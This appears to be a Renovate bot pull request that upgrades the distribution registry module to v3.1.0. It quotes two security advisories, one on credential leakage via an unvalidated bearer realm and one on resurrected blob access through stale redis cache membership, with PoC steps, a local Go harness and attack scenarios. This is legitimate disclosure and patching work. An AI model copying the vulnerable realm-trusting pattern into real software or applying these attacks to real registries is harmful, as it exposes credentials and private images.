
Renovate: Update module github.com/distribution/distribution/v3 to v3.1.0 [SECURITY] #12

Open
renovate[bot] wants to merge 1 commit into master from renovate/go-github.com-distribution-distribution-v3-vulnerability

Conversation

renovate bot commented Apr 7, 2026

This PR contains the following updates:

Package Change
github.com/distribution/distribution/v3 v3.0.0 -> v3.1.0

GitHub Vulnerability Alerts

CVE-2026-33540

hi guys,

commit: 40594bd98e6d6ed993b5c6021c93fdf96d2e5851 (as-of 2026-01-31)
contact: GitHub Security Advisory (https://github.com/distribution/distribution/security/advisories/new)

summary

in pull-through cache mode, distribution discovers token auth endpoints by parsing WWW-Authenticate challenges returned by the configured upstream registry. the realm URL from a bearer challenge is used without validating that it matches the upstream registry host. as a result, an attacker-controlled upstream (or an attacker with MitM position to the upstream) can cause distribution to send the configured upstream credentials via basic auth to an attacker-controlled realm URL.

this is the same vulnerability class as CVE-2020-15157 (containerd), but in distribution’s pull-through cache proxy auth flow.

severity

HIGH

note: the baseline impact is credential disclosure of the configured upstream credentials. if a deployment uses broader credentials for upstream auth (for example cloud iam credentials), the downstream impact can be higher; i am not claiming this as default for all deployments.

impact

credential exfiltration of the upstream authentication material configured for the pull-through cache.

attacker starting positions that make this realistic:

  • supply chain / configuration: an operator configures a proxy cache to use an upstream that becomes attacker-controlled (compromised registry, stale domain, or a malicious mirror)
  • network: MitM on the upstream connection in environments where the upstream is reachable over insecure transport or a compromised network path

affected components

  • registry/proxy/proxyauth.go:66-81 (getAuthURLs): extracts bearer realm from upstream WWW-Authenticate without validating destination
  • internal/client/auth/session.go:485-510 (fetchToken): uses the realm URL directly for token fetch
  • internal/client/auth/session.go:429-434 (fetchTokenWithBasicAuth): sends credentials via basic auth to the realm URL

reproduction

attachment: poc.zip (local harness) with canonical and control runs.

the harness is local and does not contact a real registry: it uses two local HTTP servers (upstream + attacker token service) to demonstrate whether basic auth is sent to an attacker-chosen realm.

unzip -q -o poc.zip -d poc
cd poc
make canonical
make control

expected output (excerpt):

[CALLSITE_HIT]: getAuthURLs::configureAuth
[PROOF_MARKER]: basic_auth_sent=true realm_host=127.0.0.1 account_param=user authorization_prefix=Basic

control output (excerpt):

[CALLSITE_HIT]: getAuthURLs::configureAuth
[NC_MARKER]: realm_validation=PASS basic_auth_sent=false
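the shape of the canonical run can be sketched with two local httptest servers (an illustrative sketch only, not the actual poc code; the marker format and the simplified challenge parser are assumptions):

```go
package main

import (
	"fmt"
	"net/http"
	"net/http/httptest"
	"strings"
)

// parseRealm pulls the realm parameter out of a bearer challenge
// (deliberately simplified for the sketch).
func parseRealm(challenge string) string {
	const key = `realm="`
	i := strings.Index(challenge, key)
	if i < 0 {
		return ""
	}
	rest := challenge[i+len(key):]
	return rest[:strings.Index(rest, `"`)]
}

func main() {
	// "Attacker" token service: records any Authorization header it receives.
	var gotAuth string
	attacker := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		gotAuth = r.Header.Get("Authorization")
		fmt.Fprint(w, `{"token":"x"}`)
	}))
	defer attacker.Close()

	// "Upstream" registry: challenges with a bearer realm pointing at the attacker.
	upstream := httptest.NewServer(http.HandlerFunc(func(w http.ResponseWriter, r *http.Request) {
		w.Header().Set("WWW-Authenticate", fmt.Sprintf("Bearer realm=%q,service=%q", attacker.URL, "registry"))
		w.WriteHeader(http.StatusUnauthorized)
	}))
	defer upstream.Close()

	// The vulnerable pattern: trust the realm from the challenge, then send
	// the configured upstream credentials to it via basic auth.
	resp, err := http.Get(upstream.URL + "/v2/")
	if err != nil {
		panic(err)
	}
	resp.Body.Close()
	realm := parseRealm(resp.Header.Get("WWW-Authenticate"))
	req, _ := http.NewRequest("GET", realm, nil)
	req.SetBasicAuth("user", "secret") // stands in for the configured upstream credentials
	tokResp, err := http.DefaultClient.Do(req)
	if err != nil {
		panic(err)
	}
	tokResp.Body.Close()

	fmt.Println("basic_auth_sent =", gotAuth != "")
}
```

the point of the sketch is that nothing between the challenge and the token fetch checks where the realm points, so the credentials follow it to whatever host the upstream names.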

suggested remediation

validate that the token realm destination is within the intended trust boundary before associating credentials with it or sending any authentication to it. one conservative option is strict same-host binding: only accept a realm whose host matches the configured upstream host.
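the same-host binding option can be sketched as follows (hypothetical helper, not distribution's actual API; note that some legitimate upstreams serve tokens from a different host, so a deployment may need an explicit allowlist instead):

```go
package main

import (
	"fmt"
	"net/url"
)

// validateRealm accepts a bearer realm only when it is HTTPS and its host
// matches the configured upstream registry host (strict same-host binding).
func validateRealm(upstreamHost, realm string) error {
	u, err := url.Parse(realm)
	if err != nil {
		return fmt.Errorf("invalid realm %q: %w", realm, err)
	}
	if u.Scheme != "https" {
		return fmt.Errorf("realm %q: token endpoint must be HTTPS", realm)
	}
	if u.Hostname() != upstreamHost {
		return fmt.Errorf("realm host %q does not match upstream %q", u.Hostname(), upstreamHost)
	}
	return nil
}

func main() {
	fmt.Println(validateRealm("registry.example.com", "https://registry.example.com/token")) // <nil>
	fmt.Println(validateRealm("registry.example.com", "https://attacker.example.net/token")) // error
}
```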

fix accepted when

  • distribution does not send configured upstream credentials to an attacker-chosen realm URL
  • a regression test covers the canonical and blocked cases

addendum.md
poc.zip
PR_DESCRIPTION.md
RUNNABLE_POC.md

best,
oleh

CVE-2026-35172

summary:

distribution can restore read access in repo a after an explicit delete when storage.cache.blobdescriptor: redis and storage.delete.enabled: true are both enabled. the delete path clears the shared digest descriptor but leaves stale repo-scoped membership behind, so a later Stat or Get from repo b repopulates the shared descriptor and makes the deleted blob readable from repo a again.
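the precondition is a registry configuration along these lines (minimal fragment; only the two cited keys matter here, the storage driver shown is illustrative):

```yaml
storage:
  filesystem:
    rootdirectory: /var/lib/registry
  delete:
    enabled: true          # storage.delete.enabled: true
  cache:
    blobdescriptor: redis  # storage.cache.blobdescriptor: redis
```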

Severity

HIGH

justification: this is a repo-local authorization bypass after explicit delete, with concrete confidentiality impact and no requirement for write access after the delete event. CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N (7.5). CWE-284.

affected version

details

the backend access model is repository-link based: once repo a deletes its blob link, later reads from repo a should continue returning ErrBlobUnknown even if the same digest remains linked in repo b.

the issue is the split invalidation path in the redis cache backend:

  1. linkedBlobStore.Delete calls blobAccessController.Clear during repository delete handling.
  2. cachedBlobStatter.Clear forwards that invalidation into the cache layer.
  3. repositoryScopedRedisBlobDescriptorService.Clear checks that the digest is a member of repo a, but then only calls upstream.Clear.
  4. upstream.Clear deletes the shared digest descriptor and does not remove the digest from the repository membership set for repo a.
  5. when repo b later stats or gets the same digest, the shared descriptor is recreated.
  6. repositoryScopedRedisBlobDescriptorService.Stat for repo a accepts the stale membership and now trusts the repopulated shared descriptor, restoring access in the repository that already deleted its link.

this creates a revocation gap at the repository boundary. the blob is briefly inaccessible from repo a right after delete, which confirms the backend link was removed, and then becomes accessible again only because stale redis membership survived while a peer repository repopulated the shared descriptor.
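the split invalidation can be modeled in a few lines (an in-memory stand-in for the redis state, not distribution's actual types):

```go
package main

import "fmt"

// cache models the two pieces of redis state involved: the shared
// per-digest descriptor and the per-repository membership sets.
type cache struct {
	shared     map[string]bool            // digest -> shared descriptor present
	membership map[string]map[string]bool // repo -> set of digests
}

// stat succeeds only when the repo holds membership AND the shared
// descriptor exists.
func (c *cache) stat(repo, dgst string) bool {
	return c.membership[repo][dgst] && c.shared[dgst]
}

// warm models a peer repo statting a digest it still legitimately owns,
// which recreates the shared descriptor.
func (c *cache) warm(repo, dgst string) {
	if c.membership[repo][dgst] {
		c.shared[dgst] = true
	}
}

// clear models the buggy invalidation: the shared descriptor is deleted,
// but the repo-scoped membership set is left behind.
func (c *cache) clear(repo, dgst string) {
	delete(c.shared, dgst)
	// BUG: missing delete(c.membership[repo], dgst)
}

func main() {
	c := &cache{
		shared: map[string]bool{"sha256:aa": true},
		membership: map[string]map[string]bool{
			"repo-a": {"sha256:aa": true},
			"repo-b": {"sha256:aa": true},
		},
	}
	c.clear("repo-a", "sha256:aa")
	fmt.Println("repo-a after delete:", c.stat("repo-a", "sha256:aa")) // false: revocation looks correct
	c.warm("repo-b", "sha256:aa")
	fmt.Println("repo-a after peer warm:", c.stat("repo-a", "sha256:aa")) // true: access restored
}
```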

attack scenario

  1. an operator runs distribution with storage.cache.blobdescriptor: redis and storage.delete.enabled: true.
  2. the same digest exists in both repo a and repo b.
  3. the operator deletes the blob from repo a and expects repository-local access to be revoked.
  4. repo a correctly returns blob unknown immediately after the delete.
  5. an anonymous or unprivileged user requests the same digest from repo b, which still legitimately owns it and repopulates the shared descriptor.
  6. a later request for the digest from repo a succeeds again because stale repo-a membership was never revoked from redis.

PoC

attachment: poc.zip

the attached PoC is a deterministic integration harness using miniredis and the pinned distribution source tree.

steps to reproduce

canonical:

unzip -q -o poc.zip -d poc
cd poc
make canonical

expected output:

[CALLSITE_HIT]: repositoryScopedRedisBlobDescriptorService.Clear->upstream.Clear->repositoryScopedRedisBlobDescriptorService.Stat
[PROOF_MARKER]: repo_a_access_restored=true repo_a_delete_miss=true repo_b_peer_warm=true
[IMPACT_MARKER]: repo_a_post_delete_read=true confidentiality_boundary_broken=true

control:

unzip -q -o poc.zip -d poc
cd poc
make control

expected control output:

[CALLSITE_HIT]: repositoryScopedRedisBlobDescriptorService.Clear->repositoryScopedRedisBlobDescriptorService.Stat
[NC_MARKER]: repo_a_access_restored=false repo_b_peer_warm=true

expected vs actual

  • expected: after repo a deletes its blob link, later reads from repo a should keep returning blob unknown even if repo b still references the same digest and warms cache state.
  • actual: repo a first returns blob unknown, then repo b repopulates the shared descriptor, and repo a serves the deleted digest again through stale repo-scoped redis membership.

impact

the confirmed impact is repository-local confidentiality failure after explicit delete. an operator can remove sensitive content from repo a, observe revocation working immediately after the delete, and still have the same content become readable from repo a again as soon as repo b refreshes the shared descriptor for that digest.

this is not a claim about global blob deletion. the bounded claim is that repository-local revocation fails, which breaks the expectation that deleting a blob link from one repository prevents further reads from that repository.

remediation

the safest fix is to make redis invalidation revoke repo-scoped state together with the backend link deletion. in practice that means removing the digest from the repository membership set, deleting the repo-scoped descriptor hash, and keeping that cleanup atomic enough that peer-repository warming cannot restore access in the repository that already deleted its link.
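as a sketch of the intended post-fix behavior (hypothetical names, same in-memory stand-in for redis; the real fix would keep the two deletions atomic, e.g. via MULTI/EXEC or a Lua script):

```go
package main

import "fmt"

type cache struct {
	shared     map[string]bool            // digest -> shared descriptor present
	membership map[string]map[string]bool // repo -> set of digests
}

func (c *cache) stat(repo, dgst string) bool {
	return c.membership[repo][dgst] && c.shared[dgst]
}

// clearFixed revokes the repo-scoped membership together with the shared
// descriptor, so a peer repository warming the shared entry cannot restore
// access in the repository that deleted its link.
func (c *cache) clearFixed(repo, dgst string) {
	delete(c.membership[repo], dgst)
	delete(c.shared, dgst)
}

func main() {
	c := &cache{
		shared: map[string]bool{"sha256:aa": true},
		membership: map[string]map[string]bool{
			"repo-a": {"sha256:aa": true},
			"repo-b": {"sha256:aa": true},
		},
	}
	c.clearFixed("repo-a", "sha256:aa")
	c.shared["sha256:aa"] = true // repo-b warming the shared descriptor
	fmt.Println("repo-a readable after peer warm:", c.stat("repo-a", "sha256:aa")) // false
}
```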

poc.zip
PR_DESCRIPTION.md
attack_scenario.md


Distribution affected by pull-through cache credential exfiltration via www-authenticate bearer realm

CVE-2026-33540 / GHSA-3p65-76g6-3w7r

Details: identical to the advisory text in the PR description above.

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


Distribution: stale blob access resurrection via repo-scoped redis descriptor cache invalidation

CVE-2026-35172 / GHSA-f2g3-hh2r-cwgc

Details: identical to the advisory text in the PR description above.

Severity

  • CVSS Score: 7.5 / 10 (High)
  • Vector String: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


Release Notes

distribution/distribution (github.com/distribution/distribution/v3)

v3.1.0

Compare Source

Welcome to the v3.1.0 release of registry!

This is a stable release

Please try out the release binaries and report any issues at
https://github.com/distribution/distribution/issues.

Notable Changes

See the full changelog below for the full list of changes.

What's Changed

New Contributors

Full Changelog: distribution/distribution@v3.0.0...v3.1.0


Configuration

📅 Schedule: (UTC)

  • Branch creation
    • ""
  • Automerge
    • At any time (no schedule defined)

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR becomes conflicted, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about this update again.


  • If you want to rebase/retry this PR, check this box

This PR was generated by Mend Renovate. View the repository job log.


renovate bot commented Apr 7, 2026

ℹ️ Artifact update notice

File name: go.mod

In order to perform the update(s) described in the table above, Renovate ran the go get command, which resulted in the following additional change(s):

  • 45 additional dependencies were updated

Details:

Package Change
golang.org/x/sync v0.18.0 -> v0.19.0
github.com/bshuster-repo/logrus-logstash-hook v1.0.0 -> v1.1.0
github.com/docker/docker-credential-helpers v0.8.2 -> v0.9.5
github.com/docker/go-events v0.0.0-20190806004212-e31b211e4f1c -> v0.0.0-20250808211157-605354379745
github.com/grpc-ecosystem/grpc-gateway/v2 v2.27.2 -> v2.28.0
github.com/klauspost/compress v1.18.1 -> v1.18.4
github.com/prometheus/common v0.67.4 -> v0.67.5
github.com/prometheus/otlptranslator v0.0.2 -> v1.0.0
github.com/prometheus/procfs v0.17.0 -> v0.20.1
github.com/sirupsen/logrus v1.9.3 -> v1.9.4
github.com/spf13/cobra v1.10.1 -> v1.10.2
go.opentelemetry.io/contrib/bridges/prometheus v0.57.0 -> v0.67.0
go.opentelemetry.io/contrib/exporters/autoexport v0.57.0 -> v0.67.0
go.opentelemetry.io/contrib/instrumentation/net/http/otelhttp v0.62.0 -> v0.67.0
go.opentelemetry.io/otel v1.38.0 -> v1.42.0
go.opentelemetry.io/otel/exporters/otlp/otlplog/otlploggrpc v0.14.0 -> v0.18.0
go.opentelemetry.io/otel/exporters/otlp/otlplog/otlploghttp v0.14.0 -> v0.18.0
go.opentelemetry.io/otel/exporters/otlp/otlpmetric/otlpmetricgrpc v1.38.0 -> v1.42.0
go.opentelemetry.io/otel/exporters/otlp/otlpmetric/otlpmetrichttp v1.38.0 -> v1.42.0
go.opentelemetry.io/otel/exporters/otlp/otlptrace v1.38.0 -> v1.42.0
go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracegrpc v1.38.0 -> v1.42.0
go.opentelemetry.io/otel/exporters/otlp/otlptrace/otlptracehttp v1.38.0 -> v1.42.0
go.opentelemetry.io/otel/exporters/prometheus v0.60.0 -> v0.64.0
go.opentelemetry.io/otel/exporters/stdout/stdoutlog v0.14.0 -> v0.18.0
go.opentelemetry.io/otel/exporters/stdout/stdoutmetric v1.38.0 -> v1.42.0
go.opentelemetry.io/otel/exporters/stdout/stdouttrace v1.38.0 -> v1.42.0
go.opentelemetry.io/otel/log v0.14.0 -> v0.18.0
go.opentelemetry.io/otel/metric v1.38.0 -> v1.42.0
go.opentelemetry.io/otel/sdk v1.38.0 -> v1.42.0
go.opentelemetry.io/otel/sdk/log v0.14.0 -> v0.18.0
go.opentelemetry.io/otel/sdk/metric v1.38.0 -> v1.42.0
go.opentelemetry.io/otel/trace v1.38.0 -> v1.42.0
go.opentelemetry.io/proto/otlp v1.7.1 -> v1.9.0
golang.org/x/crypto v0.45.0 -> v0.48.0
golang.org/x/mod v0.30.0 -> v0.32.0
golang.org/x/net v0.47.0 -> v0.51.0
golang.org/x/oauth2 v0.32.0 -> v0.35.0
golang.org/x/sys v0.38.0 -> v0.41.0
golang.org/x/term v0.37.0 -> v0.40.0
golang.org/x/text v0.31.0 -> v0.34.0
golang.org/x/tools v0.39.0 -> v0.41.0
google.golang.org/genproto/googleapis/api v0.0.0-20250825161204-c5933d9347a5 -> v0.0.0-20260226221140-a57be14db171
google.golang.org/genproto/googleapis/rpc v0.0.0-20251022142026-3a174f9686a8 -> v0.0.0-20260226221140-a57be14db171
google.golang.org/grpc v1.76.0 -> v1.79.3
google.golang.org/protobuf v1.36.10 -> v1.36.11
